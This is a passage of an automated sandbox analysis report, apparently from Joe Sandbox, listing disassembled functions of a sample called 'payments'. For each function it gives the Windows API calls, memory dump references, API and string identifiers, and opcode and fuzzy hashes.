                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 842720411-0
                                                                                                                          • Opcode ID: 817bdf5ab2eed8734c104abc2f58ed076f7ec64995f73bf80d5517b879b369d3
                                                                                                                          • Instruction ID: da78d3332ef680dce29eccb0330b0813b5d9fe44f14fdb0a8516b238f5e5acc7
                                                                                                                          • Opcode Fuzzy Hash: 817bdf5ab2eed8734c104abc2f58ed076f7ec64995f73bf80d5517b879b369d3
                                                                                                                          • Instruction Fuzzy Hash: 2D01FBB1200308BFDB144FA5DC48EAB3BAEEF8A7597104429F955C2260DB719D81CA71
                                                                                                                          Function 00CC9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CLSIDFromProgID.OLE32 ref: 00CC9ADC
                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000), ref: 00CC9AF7
                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000), ref: 00CC9B05
                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00CC9B15
                                                                                                                          • CLSIDFromString.OLE32(?,?), ref: 00CC9B21
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3897988419-0
                                                                                                                          • Opcode ID: 6b9b451d1127747136fe6bccbd9fe1e87293963083ca8ca2c003601b44e8e948
                                                                                                                          • Instruction ID: 1c34bfd5cb463ff50fd59bd75d91aadb95d477f9690ded4070186446efbc6d6d
                                                                                                                          • Opcode Fuzzy Hash: 6b9b451d1127747136fe6bccbd9fe1e87293963083ca8ca2c003601b44e8e948
                                                                                                                          • Instruction Fuzzy Hash: CE014FB6600615BFDB214F58ED48F9A7BFEEB44751F148028F905D2210DB74DE419BB0
                                                                                                                          Function 00CD7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7A74
                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CD7A82
                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7A8A
                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CD7A94
                                                                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7AD0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2833360925-0
                                                                                                                          • Opcode ID: 655749dcf052081d9f1d01ecde8af60a77865f30fc8876599678234881f43c88
                                                                                                                          • Instruction ID: 19be560b6213b5ad3918f159966da9458b43c11c72bf678d9c0db448f9528541
                                                                                                                          • Opcode Fuzzy Hash: 655749dcf052081d9f1d01ecde8af60a77865f30fc8876599678234881f43c88
                                                                                                                          • Instruction Fuzzy Hash: E5011779C04729ABCF00AFA5D848AEDBB79FB08711F004556E616B2350EB30969197B1
                                                                                                                          Function 00CCAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CCAADA
                                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CCAAE4
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CCAAF3
                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00CCAAFA
                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CCAB10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 44706859-0
                                                                                                                          • Opcode ID: 985fc9e3413a6699d931a1762ea02eed05b325412a211273414d8189c61ca363
                                                                                                                          • Instruction ID: 457b2209e704da11d6d2bcb345065ab1cf7c5848c1f8deb309a185f226649eaa
                                                                                                                          • Opcode Fuzzy Hash: 985fc9e3413a6699d931a1762ea02eed05b325412a211273414d8189c61ca363
                                                                                                                          • Instruction Fuzzy Hash: 9FF04F752403187FEB114FA4EC98FA73B6EFF4A758F004029FA51C7290CB609D428A71
                                                                                                                          Function 00CCAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CCAA79
                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CCAA83
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CCAA92
                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CCAA99
                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CCAAAF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 44706859-0
                                                                                                                          • Opcode ID: e27871df5abf22fdbd10053890a54a2656fcebd7ab3dfedbe3c2f898a744d4f7
                                                                                                                          • Instruction ID: 8884ce7c4bfb2e846d8f77595ba3a276e61cf97dea29d5f479d0386046acd692
                                                                                                                          • Opcode Fuzzy Hash: e27871df5abf22fdbd10053890a54a2656fcebd7ab3dfedbe3c2f898a744d4f7
                                                                                                                          • Instruction Fuzzy Hash: 2FF03C752403187FEB115FA4EC89FA73BADFB4A758B00441DF951C6290DB609C42DA71
                                                                                                                          Function 00CCEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00CCEC94
                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CCECAB
                                                                                                                          • MessageBeep.USER32(00000000), ref: 00CCECC3
                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 00CCECDF
                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00CCECF9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3741023627-0
                                                                                                                          • Opcode ID: fd7f0670534ae64353be9c2c26febb11d76b6659c5c2e3b9ed7f9db702a095eb
                                                                                                                          • Instruction ID: e56f81387547da332f216cde8385e8a7e5245c3d6c23afeb39b4e43e2c1a0f24
                                                                                                                          • Opcode Fuzzy Hash: fd7f0670534ae64353be9c2c26febb11d76b6659c5c2e3b9ed7f9db702a095eb
                                                                                                                          • Instruction Fuzzy Hash: BF01A930900718ABEB205B20DE4EFD67BB9BB01B05F00455DE692A15E0DBF0AA85CBA0
                                                                                                                          Function 00CAB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EndPath.GDI32(?), ref: 00CAB0BA
                                                                                                                          • StrokeAndFillPath.GDI32(?,?,00D0E680,00000000,?,?,?), ref: 00CAB0D6
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00CAB0E9
                                                                                                                          • DeleteObject.GDI32 ref: 00CAB0FC
                                                                                                                          • StrokePath.GDI32(?), ref: 00CAB117
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2625713937-0
                                                                                                                          • Opcode ID: e0f4519494b9dd05309ad75837730b7186236bdc0fff8283110f0fca9bd3b4f0
                                                                                                                          • Instruction ID: 0522b5d78b657096f16f7e6732351eacdb51e89985db6364ee0caa1447e708fe
                                                                                                                          • Opcode Fuzzy Hash: e0f4519494b9dd05309ad75837730b7186236bdc0fff8283110f0fca9bd3b4f0
                                                                                                                          • Instruction Fuzzy Hash: 42F0F678000705AFCB219F65EC087993B65B701366F088318F829C42F1CB348A96CF20
                                                                                                                          Function 00CDF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00CDF2DA
                                                                                                                          • CoCreateInstance.OLE32(00D1DA7C,00000000,00000001,00D1D8EC,?), ref: 00CDF2F2
                                                                                                                          • CoUninitialize.OLE32 ref: 00CDF555
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInitializeInstanceUninitialize
                                                                                                                          • String ID: .lnk
                                                                                                                          • API String ID: 948891078-24824748
                                                                                                                          • Opcode ID: aae8a78d40fe9bc3ae808773704b3547d63fe179b4199d1fb2bdee2b51d68daa
                                                                                                                          • Instruction ID: 1c591aba325854f3ba5d89121725853aefe6a49e3cc711bf81c241183b23071b
                                                                                                                          • Opcode Fuzzy Hash: aae8a78d40fe9bc3ae808773704b3547d63fe179b4199d1fb2bdee2b51d68daa
                                                                                                                          • Instruction Fuzzy Hash: 97A14D71104201AFD700EF64C886DAFB7ECEF99718F00491DF55697292EB70EA49DB62
                                                                                                                          Function 00CDE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C9660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C953B1,?,?,00C961FF,?,00000000,00000001,00000000), ref: 00C9662F
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00CDE85D
                                                                                                                          • CoCreateInstance.OLE32(00D1DA7C,00000000,00000001,00D1D8EC,?), ref: 00CDE876
                                                                                                                          • CoUninitialize.OLE32 ref: 00CDE893
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                          • String ID: .lnk
                                                                                                                          • API String ID: 2126378814-24824748
                                                                                                                          • Opcode ID: cc670ec7f72803868c3fcf20ec70fb5b84dfb000633261318d89e24895d53dc4
                                                                                                                          • Instruction ID: 016821edddb469e953cd9a89ad565aedf27f9f06331bea897d039782a3ced438
                                                                                                                          • Opcode Fuzzy Hash: cc670ec7f72803868c3fcf20ec70fb5b84dfb000633261318d89e24895d53dc4
                                                                                                                          • Instruction Fuzzy Hash: E0A159756043019FCB10EF24C48895EBBE5FF88324F048959F9969B3A1CB31ED45DB91
                                                                                                                          Function 00CB325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00CB32ED
                                                                                                                            • Part of subcall function 00CBE0D0: __87except.LIBCMT ref: 00CBE10B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHandling__87except__start
                                                                                                                          • String ID: pow
                                                                                                                          • API String ID: 2905807303-2276729525
                                                                                                                          • Opcode ID: 990b35ab8b4e2a80c674340cd00b0ed1d220e0abd406d48abd1877a59fc28b90
                                                                                                                          • Instruction ID: 1265c91f18a891e16c21f99f8d93508ba543ff6771c0848c995f5107b6b55abc
                                                                                                                          • Opcode Fuzzy Hash: 990b35ab8b4e2a80c674340cd00b0ed1d220e0abd406d48abd1877a59fc28b90
                                                                                                                          • Instruction Fuzzy Hash: 0C512871A0824196CB15B718C9413FF2BD49B50B10F348D28F4E6862AADE34CF95EA57
                                                                                                                          Function 00CD4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00D2DC50,?,0000000F,0000000C,00000016,00D2DC50,?), ref: 00CD4645
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00CD46C5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                          • String ID: REMOVE$THIS
                                                                                                                          • API String ID: 3797816924-776492005
                                                                                                                          • Opcode ID: 4c9be64047cde16b930ab0b467fc13537f22948787ad2650bfe69dad89f76d8b
                                                                                                                          • Instruction ID: 542dce84c89b6f4f16ea80b1d01946a890d1c3c712eb35c5fb9c42c614a9918d
                                                                                                                          • Opcode Fuzzy Hash: 4c9be64047cde16b930ab0b467fc13537f22948787ad2650bfe69dad89f76d8b
                                                                                                                          • Instruction Fuzzy Hash: 3741C635A002199FCF04EFA4C885AAEB7B5FF49314F14805AEB16AB3A2DB30DD45DB50
                                                                                                                          Function 00CFA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D2DC00,00000000,?,?,?,?), ref: 00CFA6D8
                                                                                                                          • GetWindowLongW.USER32 ref: 00CFA6F5
                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CFA705
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Long
                                                                                                                          • String ID: SysTreeView32
                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                          • Opcode ID: 7be6506282be5b03eaacc774d60cd380c3324fc0d32c09c2eb310820088cee3f
                                                                                                                          • Instruction ID: 934845f85a753cdb694ea8234b02f12084314eb52276bf293b7ddff440ea9ffe
                                                                                                                          • Opcode Fuzzy Hash: 7be6506282be5b03eaacc774d60cd380c3324fc0d32c09c2eb310820088cee3f
                                                                                                                          • Instruction Fuzzy Hash: 5E31B07110020AAFDB519F38CC41BEABBA9FB49324F244715F979D32E0C730AD519B61
                                                                                                                          Function 00CFA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CFA15E
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CFA172
                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CFA196
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window
                                                                                                                          • String ID: SysMonthCal32
                                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                                          • Opcode ID: 0b037293d0d880f077c55cf75182645cc837c40407e173d54c5e68a72dee83b3
                                                                                                                          • Instruction ID: 408fc660f2a6505fa02b2673c443541f8fb5aba0523f4e764a7d71fcf4c3191a
                                                                                                                          • Opcode Fuzzy Hash: 0b037293d0d880f077c55cf75182645cc837c40407e173d54c5e68a72dee83b3
                                                                                                                          • Instruction Fuzzy Hash: B321AD72500218ABDF158F94CC42FEE3B7AEF48714F114214FB59AB190D6B5A851DBA1
                                                                                                                          Function 00CFA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CFA941
                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CFA94F
                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CFA956
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                          • String ID: msctls_updown32
                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                          • Opcode ID: b00d83bc534a7618b7b494c5f3048b8187499a9aee16a08decc5de7ac2ea07e4
                                                                                                                          • Instruction ID: f79d79d80a36af254f80b116e1d3620474441dddc0a74e0778db4915c35996c5
                                                                                                                          • Opcode Fuzzy Hash: b00d83bc534a7618b7b494c5f3048b8187499a9aee16a08decc5de7ac2ea07e4
                                                                                                                          • Instruction Fuzzy Hash: 7F21B2B9600209AFDB00DF18CC91EB777ADEB4A3A4B040059FA18973A1CB70ED118B72
                                                                                                                          Function 00CF99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CF9A30
                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CF9A40
